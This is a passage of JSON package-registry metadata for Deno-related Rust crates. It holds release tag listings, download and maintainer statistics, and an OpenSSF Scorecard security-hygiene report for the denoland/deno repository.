s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T17:16:19.490Z","dependent_packages_count":0,"downloads":4262,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.80213430811862,"dependent_repos_count":24.302222746300338,"dependent_packages_count":32.233948470019456,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.77943517481281},"purl":"pkg:cargo/deno_permissions_extended","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_permissions_extended","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_permissions_extended","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_permissions_extended/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/codemeta","maintainers":[{"uuid":"300816","login":"carloslfu","name":"Carlos Galarza","email":null,"url":"https://github.com/carloslfu","packages_count":8,"html_url":"https://crates.io/users/carloslfu","role":null,"created_at":"2024-11-29T00:47:08.270Z","updated_at":"2024-11-29T00:47:08.270Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/carloslfu/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047423,"name":"deno_fetch","ecosystem":"cargo","description":"Fetch API implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":290,"first_release_published_at":"2020-09-18T20:41:28.335Z","latest_release_published_at":"2026-08-27T15:20:23.993Z","latest_release_number":"0.282.0","last_synced_at":"2026-09-07T22:55:51.269Z","created_at":"2022-04-12T10:00:23.322Z","updated_at":"2026-09-07T22:55:51.270Z","registry_url":"https://crates.io/crates/deno_fetch/","install_command":"cargo install deno_fetch","documentation_url":"https://docs.rs/deno_fetch/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: 